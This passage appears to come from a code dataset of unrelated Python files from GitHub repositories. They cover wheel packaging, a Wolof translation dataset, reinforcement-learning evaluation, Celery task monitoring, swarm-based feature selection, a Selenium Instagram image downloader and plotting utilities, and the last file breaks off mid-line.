'use-package-version' in self.options \\\n and self.options['use-package-version'] == 'True'\n if self.usePackageVersion:\n self.filenameFullVersion = \"%s-%s\" % (\n version,\n self.packageVersion )\n else:\n self.filenameFullVersion = version\n self.fullVersion = self.filenameFullVersion\n if '**python-tag' not in self.packageMetadata:\n self.log.error(\"One or more flavors of 'Programming Language :: Python' must be in the metadata's classifiers\")\n self.log.failed()\n raise ValueError(\"Python packaging required\")\n\n pytags = self.packageMetadata['**python-tag']\n pytags.sort()\n initprio, _ = pytags[0]\n tags = []\n for priority, tag in pytags:\n if priority != initprio:\n break\n tags.append(tag)\n tags.sort()\n pythonTag = '.'.join(tags)\n abi = 'none'\n arch = 'any'\n if 'abi' in self.options:\n abi = self.options['abi']\n if 'arch' in self.options:\n arch = self.options['arch']\n self.wheelTag = '%s-%s-%s' % (\n pythonTag,\n abi,\n arch )\n self.fullPackageName = \"%s-%s-%s.whl\" % (\n self.packageName,\n self.filenameFullVersion,\n self.wheelTag )\n self.distinfoName = \"%s-%s.dist-info\" % (\n self.packageName,\n self.version )\n self.archiveFileName = self.fullPackageName\n self.fullPathToArchive = os.path.join(\n self.resultdir,\n self.archiveFileName )\n\n def _filePlacingInPackage(self, archive, sourcePath, archivePath, contents=None):\n if sourcePath is not None:\n with open(sourcePath) as content:\n size = self._filesize(content)\n shasum = self._PEP427Encode(self._fileSHA256(content))\n self.contents.append(\"%s,sha256=%s,%s\" % (\n archivePath.lstrip('/'),\n shasum,\n size))\n elif contents is not None:\n size = len(contents)\n shacalc = hashlib.sha256()\n shacalc.update(contents)\n shasum = self._PEP427Encode(shacalc.hexdigest())\n self.contents.append(\"%s,sha256=%s,%s\" % (\n archivePath,\n shasum,\n size))\n\n def _setupPackage(self):\n self.contents = []\n ZipPackager._setupPackage(self)\n\n def _generateMetadataContents(self):\n result = ['Metadata-Version: 2.0']\n jsonResult = {'metadata_version':'2.0'}\n for key, value in self.packageMetadata.iteritems():\n if key.startswith('**'):\n continue\n result.append('%s: %s' % (key, value))\n jsonResult[key.lower()] = value\n if 'keywords' in jsonResult:\n jsonResult['keywords'] = jsonResult['keywords'].split()\n result.append('Version: %s' % self.version)\n jsonResult['version'] = self.version\n jsonResult['generator'] = self.WHEEL_GENERATOR\n authors = []\n jsonResult['extensions'] = {}\n if 'copyrights' in self.productMetadata:\n for copy in self.productMetadata['copyrights']:\n holder = (copy['holder'],None)\n if '<' in holder:\n holderparts = holder.split('<')\n holderName = holderparts[0]\n email = holderparts[1].rstrip().rstrip('>')\n holder = (holderName, email)\n authors.append(holder)\n result.append(\"Author: %s\" % ', '.join([x[0] for x in authors]))\n emails = [x[1] for x in authors if x[1] is not None]\n if len(emails) > 0:\n result.append('Author-email: %s' % ', '.join(emails))\n if 'python.details' not in jsonResult['extensions']:\n jsonResult['extensions']['python.details'] = {}\n if 'contacts' not in jsonResult['extensions']['python.details']:\n jsonResult['extensions']['python.details']['contacts'] = []\n jsonContacts = jsonResult['extensions']['python.details']['contacts']\n for author in authors:\n if author[1] is None:\n jsonContacts.append({'name':author[0], 'role':'author'})\n else:\n jsonContacts.append({'name':author[0], 'email':author[1], 'role':'author'})\n #TODO: Add python.details/document_names: {'description' : 'DESCRIPTION.rst'}\n #TODO: Add python.exports/console_scripts\n #TODO: Add python.commands/wrap_console\n for classifier in self.classifiers:\n result.append('Classifier: %s' % classifier)\n jsonResult['classifiers'] = self.classifiers\n arch = 'any'\n if 'arch' in self.options:\n arch = self.options['arch']\n archivePath = os.path.join(\n self.distinfoName,\n \"METADATA\" )\n content = '\\n'.join(result)\n #TODO: Append DESCRIPTION.rst\n self._filePlacingInPackage(\"data\", None, archivePath, content)\n self.archive.writestr(archivePath, content)\n archivePath = os.path.join(\n self.distinfoName,\n \"metadata.json\" )\n content = json.dumps(jsonResult)\n self._filePlacingInPackage(\"data\", None, archivePath, content)\n self.archive.writestr(archivePath, content)\n\n def _generateWheelFileContents(self):\n result = ['Wheel-Version: 1.0', 'Generator: %s' % self.WHEEL_GENERATOR]\n purelib = 'true'\n if ('arch' in self.options and self.options['arch'] != 'any') \\\n or ('abi' in self.options and self.options['abi'] != 'none'):\n purelib = 'false'\n result.append('Root-Is-Purelib: %s' % purelib)\n result.append(\"Tag: %s\" % self.wheelTag)\n if self.usePackageVersion:\n result.append(\"Build: %s\", self.options['package-version'])\n archivePath = os.path.join(\n self.distinfoName,\n \"WHEEL\" )\n content = '\\n'.join(result)\n self._filePlacingInPackage(\"data\", None, archivePath, content)\n self.archive.writestr(archivePath, content)\n\n def _generateTopLevelFile(self):\n toplevel = \"%s\\n\" % self.packageName\n if 'top-level' in self.options:\n toplevel = \"%s\\n\" % self.options['top-level']\n archivePath = os.path.join(\n self.distinfoName,\n \"top_level.txt\" )\n self._filePlacingInPackage(\"data\", None, archivePath, toplevel)\n self.archive.writestr(archivePath, toplevel)\n\n def _generateRecord(self):\n #In order to ensure all other files are captured,\n #This needs to be the last file generated.\n record = '\\n'.join(self.contents)\n archivePath = os.path.join(\n self.distinfoName,\n \"RECORD\" )\n #Do not call filePlacingInPackage -it will try to add this file to the\n # contents of this file.\n self.archive.writestr(archivePath, record)\n\n def _finishPackage(self):\n #Write out all metafiles\n #TODO: Place or generate a DESCRIPTION.rst\n self._generateMetadataContents()\n self._generateWheelFileContents()\n self._generateTopLevelFile()\n\n #Write out RECORD file\n #Last step\n self._generateRecord()\n return ZipPackager._finishPackage(self)\n","repo_name":"csmake-hpe/csmake-packaging","sub_path":"CsmakeModules/WheelPackage.py","file_name":"WheelPackage.py","file_ext":"py","file_size_in_byte":12812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21915681051","text":"\nfrom wolof_translate.utils.sent_transformers import TransformerSequences\nfrom wolof_translate.data.dataset_v4 import T5SentenceDataset\nfrom transformers import PreTrainedTokenizerFast\nfrom torch.utils.data import Dataset\nfrom typing import *\nimport pandas as pd\nimport torch\nimport re\n\nclass SentenceDataset(T5SentenceDataset):\n\n def __init__(\n self,\n data_path: str, \n tokenizer: PreTrainedTokenizerFast,\n corpus_1: str = \"french\",\n corpus_2: str = \"wolof\",\n file_sep: str = \",\",\n cp1_transformer: Union[TransformerSequences, None] = None,\n cp2_transformer: Union[TransformerSequences, None] = None,\n **kwargs):\n \n super().__init__(data_path, \n tokenizer,\n corpus_1,\n corpus_2,\n 0,\n False,\n file_sep,\n cp1_transformer,\n cp2_transformer\n **kwargs)\n \n def __getitem__(self, index):\n \"\"\"Recuperate ids and attention masks of sentences at index\n\n Args:\n index (int): The index of the sentences to recuperate\n\n Returns:\n tuple: The `sentence to translate' ids`, `the attention mask of the sentence to translate`\n `the labels' ids`\n \"\"\"\n sentence_1 = self.sentences_1[index]\n \n sentence_2 = self.sentences_2[index]\n \n # apply transformers if necessary\n if not self.cp1_transformer is None:\n \n sentence_1 = self.cp1_transformer(sentence_1)[0] \n \n if not self.cp2_transformer is None:\n \n sentence_2 = self.cp2_transformer(sentence_2)[0]\n \n # let us encode the sentences (we provide the second sentence as labels to the tokenizer)\n data = self.tokenizer(\n sentence_1\n )\n \n # let us encode the sentences (we provide the second sentence as labels to the tokenizer)\n labels = self.tokenizer(\n sentence_2\n )\n \n return (data.input_ids.squeeze(0), \n labels.input_ids.squeeze(0))\n \n","repo_name":"Oumar199/Wolof_traduction","sub_path":"wolof-translate/wolof_translate/data/dataset_v5.py","file_name":"dataset_v5.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3184705271","text":"import seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\n\ndef avg_duration_final_rinse(train_balanced: pd.DataFrame) -> None:\n temp = train_balanced[train_balanced.phase == 'final_rinse'].groupby(\"process_id\").size()\n temp.plot()\n print(\n (\"Moyenne : \" + str(int(temp.mean())) + \" / Maximum : \"\n + str(temp.max()) + \" / Minimum : \" + str(temp.min()))\n )\n\n\ndef avg_duration_per_phase(train_balanced: pd.DataFrame) -> None:\n phases = train_balanced.phase.unique()\n print(phases)\n temp = train_balanced.groupby([\"process_id\", \"phase\"]).size()\n temp.reset_index(inplace=True)\n g = sns.FacetGrid(temp[temp[0] < 1000], col=\"phase\", col_order=phases, size=10)\n g = g.map(plt.hist, 0, bins=100)\n\n\ndef viz_columns(train_balanced):\n cols = [\"supply_pump\", \"supply_pre_rinse\", \"supply_caustic\", \"return_caustic\", \"supply_acid\",\n \"return_acid\", \"supply_clean_water\", \"return_recovery_water\", \"object_low_level\"]\n for col in cols:\n sns.countplot(data=train_balanced, hue=\"phase\", x=col)\n plt.show()\n","repo_name":"JeremyLG/RinseOverRun","sub_path":"src/dataViz/dataViz.py","file_name":"dataViz.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74154150506","text":"import os\n\nos.environ[\"XLA_PYTHON_CLIENT_MEM_FRACTION\"] = \".2\"\n\nimport time\n\nimport d4rl\nimport gym\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom models import TD3BCAgent\n\n\ndef eval_policy(agent,\n eval_env,\n obs_mean: np.ndarray = 0.0,\n obs_std: np.ndarray = 1.0,\n eval_episodes: int = 10):\n t1 = time.time()\n avg_reward = 0.\n for _ in range(eval_episodes):\n obs, done = eval_env.reset(), False\n while not done:\n obs = (obs - obs_mean)/obs_std\n action = agent.sample_action(obs)\n obs, reward, done, _ = eval_env.step(action)\n avg_reward += reward\n avg_reward /= eval_episodes\n d4rl_score = eval_env.get_normalized_score(avg_reward) * 100\n return d4rl_score, time.time() - t1\n\n\nmujoco_envs = [\n \"halfcheetah-random-v2\",\n \"halfcheetah-medium-v2\",\n \"halfcheetah-medium-replay-v2\",\n \"hopper-random-v2\",\n \"hopper-medium-v2\",\n \"hopper-medium-replay-v2\",\n \"walker2d-random-v2\",\n \"walker2d-medium-v2\",\n \"walker2d-medium-replay-v2\",\n]\n\nantmaze_envs = [\n \"antmaze-umaze-v0\",\n \"antmaze-umaze-diverse-v0\",\n \"antmaze-medium-play-v0\",\n \"antmaze-medium-diverse-v0\",\n \"antmaze-large-play-v0\",\n \"antmaze-large-diverse-v0\",\n]\n\n\ndef save_td3bc_stats():\n td3bc_res = {}\n for env_name in mujoco_envs:\n env = gym.make(env_name)\n ds = d4rl.qlearning_dataset(env)\n ds_observations = ds[\"observations\"]\n obs_mean = ds_observations.mean(0)\n obs_std = ds_observations.std(0) + 1e-3\n td3bc_res[env_name] = {\"obs_mean\": obs_mean,\n \"obs_std\": obs_std}\n np.save(\"td3bc_obs_stats\", td3bc_res)\n data = np.load(\"td3bc_obs_stats.npy\", allow_pickle=True)\n\n\nres = []\nfor env_name in tqdm(mujoco_envs):\n env = gym.make(env_name)\n obs_dim = env.observation_space.shape[0]\n act_dim = env.action_space.shape[0]\n agent = TD3BCAgent(obs_dim, act_dim)\n obs_mean = td3bc_res[env_name][\"obs_mean\"]\n obs_std = td3bc_res[env_name][\"obs_std\"]\n agent.load(f\"saved_ckpts/{env_name}\", 200)\n score, _ = eval_policy(agent, env, obs_mean, obs_std)\n res.append((env_name, score))\n","repo_name":"fuyw/jrlzoo","sub_path":"td3bc/check_ckpts.py","file_name":"check_ckpts.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"71209650987","text":"import multiprocessing\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom experiments.diversity import dist_plots\nfrom experiments.diversity.measure_samples import METRICS_ROOT\n\nCHECKPOINT_ROOT = \"/data/morphomnist/checkpoints\"\nFIGURE_ROOT = \"/vol/biomedic/users/dc315/morphomnist/fig\"\n\n\ndef main(metrics, figure_path=None):\n # cols = ['length', 'thickness', 'slant', 'aspect']\n # lims = [(10, 70), (0, 7), (-45, 45), (0, 2.5)]\n cols = ['length', 'thickness', 'slant', 'width', 'height']\n lims = [(10, 70), (0, 7), (-45, 45), (0, 22), (8, 22)]\n multiples = {'length': 20, 'thickness': 2, 'slant': 30, 'width': 10, 'height': 5, 'aspect': .5}\n formats = {'slant': \"%d\\u00b0\", 'aspect': \"%g\"}\n metrics['slant'] = np.rad2deg(metrics['slant'])\n\n dist_plots.plot_distribution(metrics, cols, lims, multiples, formats)\n if figure_path is not None:\n fig_kwargs = dict(dpi=400, bbox_inches='tight', pad_inches=0)\n print(f\"Saving figure to {figure_path}\")\n plt.savefig(figure_path, **fig_kwargs)\n plt.show()\n\n\nif __name__ == '__main__':\n os.makedirs(FIGURE_ROOT, exist_ok=True)\n dataset_dir = \"/vol/biomedic/users/dc315/mnist/plain\"\n test_metrics = pd.read_csv(os.path.join(dataset_dir, \"t10k-morpho.csv\"))\n figure_path = os.path.join(FIGURE_ROOT, f\"test_plain_morpho_dist.pdf\")\n\n specs = [\n \"VAE-64_plain\",\n \"GAN-64_plain\",\n \"GAN-2_plain\",\n ]\n\n pool = multiprocessing.Pool()\n pool.apply_async(main, (test_metrics, figure_path))\n for spec in specs:\n sample_metrics = pd.read_csv(os.path.join(METRICS_ROOT, f\"{spec}_metrics.csv\"))\n figure_path = os.path.join(FIGURE_ROOT, f\"{spec}_morpho_dist.pdf\")\n pool.apply_async(main, (sample_metrics, figure_path))\n pool.close()\n pool.join()\n","repo_name":"dccastro/Morpho-MNIST","sub_path":"experiments/diversity/plot_dists.py","file_name":"plot_dists.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"37"} +{"seq_id":"26884194535","text":"import time\ntimestamp = time.strftime(\"%H:%M:%S\")\n# print(type(timestamp))\nprint(timestamp)\nhour = int(time.strftime(\"%H\"))\nif(hour<12):\n print(\"Good Morning\")\nelif(hour<18):\n print(\"Good Noon\")\nelse:\n print(\"Good Night\")","repo_name":"tanvirahmed1732/Practice","sub_path":"Python Practice/time_wishing.py","file_name":"time_wishing.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29568771403","text":"from celery import task\nfrom celery.task.control import inspect # for ispectTasks\nimport time\nfrom ..config import clog\nfrom .tbase import getBaseP, getBaseC, getLine\nfrom ..models import mcomment\nfrom ..models import msubreddit\nfrom ..models import mthread\nfrom ..models import muser\n# import pprint\n\n# --------------------------------------------------------------------------\n@task()\ndef TASK_template():\n mi = clog.dumpMethodInfo()\n ts = time.time()\n\n # # create PRAW prawReddit instance\n # prawReddit = mcomment.getPrawRedditInstance()\n\n clog.logger.info(\"%s\" % (getBaseP(mi)))\n\n clog.logger.info(\"%s\" % (getBaseC(mi, ts)))\n return \"\"\n\n# --------------------------------------------------------------------------\nheartbeatTickString = \"TICK\"\n@task()\ndef TASK_inspectTaskQueue():\n mi = clog.dumpMethodInfo()\n ts = time.time()\n\n thisTaskName = 'reddit.tasks.tmisc.TASK_inspectTaskQueue'\n workerName = \"celery@datagrab\"\n\n i = inspect()\n\n # clog.logger.info(\"scheduled: %s\" % (pprint.pformat(i.scheduled())))\n # clog.logger.info(\"active: %s\" % (pprint.pformat(i.active())))\n # clog.logger.info(\"reserved: %s\" % (pprint.pformat(i.reserved())))\n\n # Scheduled Tasks\n scheduledCount = 0\n scheduled = i.scheduled()\n if len(scheduled) > 0 and workerName in scheduled:\n scheduledList = scheduled[workerName]\n for item in scheduledList:\n if item['name'] != thisTaskName: # Ignore THIS task\n scheduledCount += 1\n\n # Active Tasks\n activeCount = 0\n active = i.active()\n if len(active) > 0 and workerName in active:\n activeList = active[workerName]\n for item in activeList:\n if item['name'] != thisTaskName: # Ignore THIS task\n activeCount += 1\n\n # Reserved Tasks\n reservedCount = 0\n reserved = i.reserved()\n if len(reserved) > 0 and workerName in reserved:\n reservedList = reserved[workerName]\n for item in reservedList:\n if item['name'] != thisTaskName: # Ignore THIS task\n reservedCount += 1\n\n global heartbeatTickString\n if heartbeatTickString == 'TICK': heartbeatTickString = 'tock'\n else: heartbeatTickString = 'TICK'\n\n if scheduledCount or activeCount or reservedCount:\n clog.logger.info(\"%s %s: %d active, %d scheduled, %d reserved\" % (getBaseC(mi, ts), heartbeatTickString, activeCount, scheduledCount, reservedCount))\n else:\n clog.logger.info(\"%s %s: %s\" % (getBaseC(mi, ts), heartbeatTickString, \"*** no pending tasks ***\"))\n return \"\"\n\n# --------------------------------------------------------------------------\n@task()\ndef TASK_generateModelCountData():\n mi = clog.dumpMethodInfo()\n\n users_poi = muser.objects.filter(ppoi=True).count()\n users_notPoi = muser.objects.filter(ppoi=False).count()\n\n users_poi_pri_0 = muser.objects.filter(ppoi=True).filter(pprioritylevel=0).count()\n users_poi_pri_1 = muser.objects.filter(ppoi=True).filter(pprioritylevel=1).count()\n users_poi_pri_2 = muser.objects.filter(ppoi=True).filter(pprioritylevel=2).count()\n users_poi_pri_3 = muser.objects.filter(ppoi=True).filter(pprioritylevel=3).count()\n\n comments_usersAdded = mcomment.objects.filter(puseradded=True).count()\n comments_notUsersAdded = mcomment.objects.filter(puseradded=False).count()\n\n subreddits_poi = msubreddit.objects.filter(ppoi=True).count()\n subreddits_notPoi = msubreddit.objects.filter(ppoi=False).count()\n\n subreddits_poi_pri_0 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=0).count()\n subreddits_poi_pri_1 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=1).count()\n subreddits_poi_pri_2 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=2).count()\n subreddits_poi_pri_3 = msubreddit.objects.filter(ppoi=True).filter(pprioritylevel=3).count()\n\n threads_forestGot = mthread.objects.filter(pforestgot=True).count()\n threads_notForestGot = mthread.objects.filter(pforestgot=False).count()\n\n listOfModelCountStrings = []\n\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi\", users_poi))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users !poi\", users_notPoi))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 0\", users_poi_pri_0))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 1\", users_poi_pri_1))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 2\", users_poi_pri_2))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Users poi priority 3\", users_poi_pri_3))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Comments users added\", comments_usersAdded))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Comments !users added\", comments_notUsersAdded))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Comments total\", comments_usersAdded + comments_notUsersAdded))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi\", subreddits_poi))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits !poi\", subreddits_notPoi))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 0\", subreddits_poi_pri_0))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 1\", subreddits_poi_pri_1))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 2\", subreddits_poi_pri_2))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Subreddits poi priority 3\", subreddits_poi_pri_3))\n listOfModelCountStrings.append(\"%s\" % (\"---------------------------------------\"))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Threads forestGot\", threads_forestGot))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Threads !forestGot\", threads_notForestGot))\n listOfModelCountStrings.append(\"%-30s %8d\" % (\"Threads total\", threads_forestGot + threads_notForestGot))\n\n return listOfModelCountStrings\n\n# --------------------------------------------------------------------------\n@task()\ndef TASK_displayModelCounts():\n mi = clog.dumpMethodInfo()\n ts = time.time()\n\n listOfModelCountStrings = TASK_generateModelCountData()\n\n clog.logger.info(\"%s %s\" % (getBaseC(mi, ts), getLine()))\n for line in listOfModelCountStrings:\n # clog.logger.info(\"%s * %s *\" % (getBaseC(mi, ts), line))\n clog.logger.info(\"%s %s \" % (getBaseC(mi, ts), line))\n clog.logger.info(\"%s %s\" % (getBaseC(mi, ts), getLine()))\n return\n","repo_name":"VestedSkeptic/datagrab","sub_path":"reddit/tasks/tmisc.py","file_name":"tmisc.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30279219324","text":"import math\nimport numpy as np\nimport pyswarms as ps\nimport random\nimport sys\nfrom scipy.spatial import distance as dist\n\n\nfrom EvaluateMask import EvaluateMask\nfrom LoadFeatures import LoadFeatures\n\n\nif len(sys.argv) != 4:\n\tprint(\"Missing parameters\")\n\tprint(\"FORMAT: algorithm data_set ones_ratio run\")\n\texit()\n\nalgorithm = sys.argv[0].split(\".\")[0]\ndata_set = sys.argv[1]\nones_ratio = float(sys.argv[2])\nrun_no = int(sys.argv[3])\nall_features_file_name = \"../Concatenator/\"+data_set+\"/AllFeatures.txt\"\nout_file_name = \"output/\"+algorithm+\"-\"+data_set+\"-\"+str(ones_ratio)+\"-\"+str(run_no)\n\nPopSize = 100\nNIter = int(15000/PopSize)\nUseDiscrete = True\nDecayRate = 0.15\nFitnessWeight = 0.7\nStepSize = 0.1\nFeatureWeight = 0.0\n\nclass Worm:\n\tdef __init__(self, n_dim):\n\t\tself.location = np.random.uniform(low=0, high=1, size=n_dim)\n\t\tself.luciferin = 0.5\n\t\tself.radius = math.sqrt(n_dim)\n\n\n\tdef update_luciferin(self, x, y):\n\t\tif UseDiscrete:\n\t\t\tmask = [0 if _ < 0.5 else 1 for _ in self.location]\n\t\telse:\n\t\t\tmask = self.location\n\t\tself.luciferin = (self.luciferin * (1.0 - DecayRate)) + (FitnessWeight * EvaluateMask(mask, x, y, feature_weight = FeatureWeight))\n\n\tdef update_position(self, other):\n\t\tdelta = np.array(other.location) - np.array(self.location)\n\t\tmove = StepSize * delta/math.sqrt(np.sum(delta ** 2.0))\n\t\tself.location = np.array(self.location) + move\n\ndef CreatePopulation(pop_size, n_dim):\n\tpop = []\n\tfor _ in range(pop_size):\n\t\tpop.append(Worm(n_dim))\n\treturn pop\n\ndef UpdateLuciferinLevels(pop, x, y):\n\tfor worm in pop:\n\t\tworm.update_luciferin(x,y)\n\ndef GetNeighbors(worm, pop):\n\tneighbors = []\n\tfor w in pop:\n\t\tif (dist.euclidean(worm.location, w.location) < worm.radius) and (worm.luciferin < w.luciferin):\n\t\t\tneighbors.append(w)\n\treturn neighbors\n\ndef SelectNeighbor(worm, neighbors):\n\tdeltas = []\n\tsum = 0.0\n\tfor w in neighbors:\n\t\tdelta = w.luciferin - worm.luciferin\n\t\tdeltas.append(delta)\n\t\tsum += delta\n\tweights = np.array(deltas)/sum\n\treturn random.choices(neighbors, weights)[0]\n\t\t\n\ndef UpdatePositions(pop):\n\tfor worm in pop:\n\t\tneighbors = GetNeighbors(worm, pop)\n\t\tif len(neighbors) > 0:\n\t\t\tneighbor = SelectNeighbor(worm, neighbors)\n\t\t\tworm.update_position(neighbor)\n\ndef UpdateSensorRadius(pop):\n\tpass\n\ndef BestFit(pop, x, y):\n\treturn max(pop, key=lambda worm: EvaluateMask(worm.location, x, y, feature_weight = FeatureWeight))\n\ndef SwarmMask(x, y):\n\n\t# Input: array of shape (pop_size, features)\n\t# Output: fitness values of shape (pop_size)\n\n\tpop = CreatePopulation(PopSize, len(x[0]))\n\tfor _ in range(NIter):\n\t\t#print('loop = '+str(_))\n\t\tUpdateLuciferinLevels(pop, x, y)\n\t\tUpdatePositions(pop)\n\t\tUpdateSensorRadius(pop)\n\n\tloc = BestFit(pop, x, y).location\n\tif UseDiscrete:\n\t\tmask = [0 if _ < 0.5 else 1 for _ in loc]\n\telse:\n\t\tmask = loc\n\treturn mask\n\nx, y = LoadFeatures(all_features_file_name)\n\nFeatureWeight = ones_ratio\nmask = SwarmMask(x, y)\n\naccuracy = EvaluateMask(mask, x, y, feature_weight=0)\n\nwith open(out_file_name, 'w') as out_file:\n\tout_file.write(str(accuracy)+\",\"+str(mask)+\"\\n\")\n","repo_name":"shallada/SwarmAttribution","sub_path":"FeatureSelectors/GlowwormSwarmOptimization.py","file_name":"GlowwormSwarmOptimization.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28788117356","text":"from selenium import webdriver\nfrom time import sleep\nimport urllib.request\n\ndriver = webdriver.Chrome()\n\ndriver.get('https://www.instagram.com/')\nsleep(2)\n\nlogin_link = driver.find_element_by_xpath(\"//*[@id='loginForm']\")\nlogin_link.click()\n\nsleep(2)\n\nusername_input = driver.find_element_by_css_selector(\"input[name='username']\")\npassword_input = driver.find_element_by_css_selector(\"input[name='password']\")\n\nusername_input.send_keys(\"USERNAME\")\npassword_input.send_keys(\"PASSWORD\")\n\nlogin_button = driver.find_element_by_xpath(\"//button[@type='submit']\")\nlogin_button.click()\n\nsleep(3)\ndriver.get(\"https://instagram.com/funnywhimsical/\")\n#Scroll to Last\nlenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\nmatch = False\nwhile(match==False):\n lastCount = lenOfPage\n sleep(3)\n lenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\n if lastCount == lenOfPage:\n match=True\n\nposts = []\nlinks = driver.find_elements_by_tag_name('a')\nfor link in links:\n post = link.get_attribute('href')\n if '/p/' in post:\n posts.append(post)\n\nprint(posts)\n\ndownload_url = ''\nfor post in posts:\n driver.get(post)\n url = driver.current_url\n shortcode = url.split(\"/\")[-2]\n urllib.request.urlretrieve(url, \"{}.jpg\".format(shortcode))\n\n print( download_url )\n\ndriver.close()","repo_name":"Abs7992/instaScrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71295602346","text":"import math\r\nimport pathlib\r\nimport joblib\r\nimport numpy as np\r\n\r\n\r\n# Access path where dataset is stored\r\nPATH = pathlib.Path(pathlib.Path(__file__).parent.resolve()).parent.resolve()\r\ndirectory = str(PATH) + r'\\data\\python_data'\r\nV_rescaled_path = directory + r'\\V_rescaled.joblib' \r\nI_rescaled_path = directory + r'\\I_rescaled.joblib'\r\nI_rescaled_noDC_path = directory+r'\\Ι_rescaled_noDC.joblib'\r\nV_rescaled_noDC_path = directory+r'\\V_rescaled_noDC.joblib'\r\n\r\nV_rescaled = joblib.load(V_rescaled_path)\r\n#I_rescaled = joblib.load(I_rescaled_path)\r\n#V_rescaled_noDC = joblib.load(V_rescaled_noDC_path)\r\n\r\nfor idx in range(V_rescaled.shape[0]):\r\n for branch in range(V_rescaled.shape[1]):\r\n for meter in range(V_rescaled.shape[3]):\r\n dc = V_rescaled[idx,branch,0,meter]\r\n for time in range(V_rescaled.shape[2]):\r\n V_rescaled[idx,branch,time,meter] = abs(V_rescaled[idx,branch,time,meter] - dc)\r\n \r\njoblib.dump(V_rescaled, V_rescaled_noDC_path)\r\n\r\n#%%\r\n\r\n#V_rescaled = joblib.load(V_rescaled_path)\r\nI_rescaled = joblib.load(I_rescaled_path)\r\n#V_rescaled_noDC = joblib.load(V_rescaled_noDC_path)\r\n\r\nfor idx in range(I_rescaled.shape[0]):\r\n for meter in range(I_rescaled.shape[2]):\r\n dc = I_rescaled[idx,0,meter]\r\n for time in range(I_rescaled.shape[1]):\r\n I_rescaled[idx,time,meter] = abs(I_rescaled[idx,time,meter] - dc)\r\n \r\njoblib.dump(I_rescaled, I_rescaled_noDC_path)","repo_name":"bRizeakos/Fault-Location-Identification-Classification-in-LV-grids","sub_path":"remove_dc.py","file_name":"remove_dc.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"28976196618","text":"import numpy as np\n\nfrom efficientroutes import model\n\neps = 1e-15\n\ndef test_Bicyclist():\n mass = 84.0\n Cd = 1.16\n W_max = 120\n A = 0.56\n bicyclist = model.Bicyclist(mass=mass, dragCoefficient=Cd,\n frontalArea=A, maxPower=W_max, ridingStyle='casual')\n\n assert (bicyclist.mass - mass) < eps\n assert (bicyclist.dragCoefficient - Cd) < eps\n assert (bicyclist.frontalArea - A) < eps\n assert (bicyclist.maxPower - W_max) < eps\n assert bicyclist.ridingStyle == 'casual'\n\n g = 9.81\n assert (bicyclist.weight() - mass * g) < eps\n\n speed = 5.0\n rho = 1.2\n angle = 0.1\n drag = -np.sign(speed) * rho * speed**2 / 2.0 * Cd * A\n assert (bicyclist.aero_drag(rho, speed) - drag) < eps\n assert (bicyclist.normal_force(angle) - (mass * g) * np.cos(angle)) < eps\n assert (bicyclist.incline_force(angle) + (mass * g) * np.sin(angle)) < eps\n Cr = 0.008\n assert (bicyclist.rolling_friction(Cr, speed, angle) - (-np.sign(speed) *\n Cr * (mass * g) * np.cos(angle) * (1.0 - np.exp(-speed / 10.0)))) < eps\n Ca = 0.17\n assert (bicyclist.max_brake_force(Ca, angle) - Ca * mass * g *\n 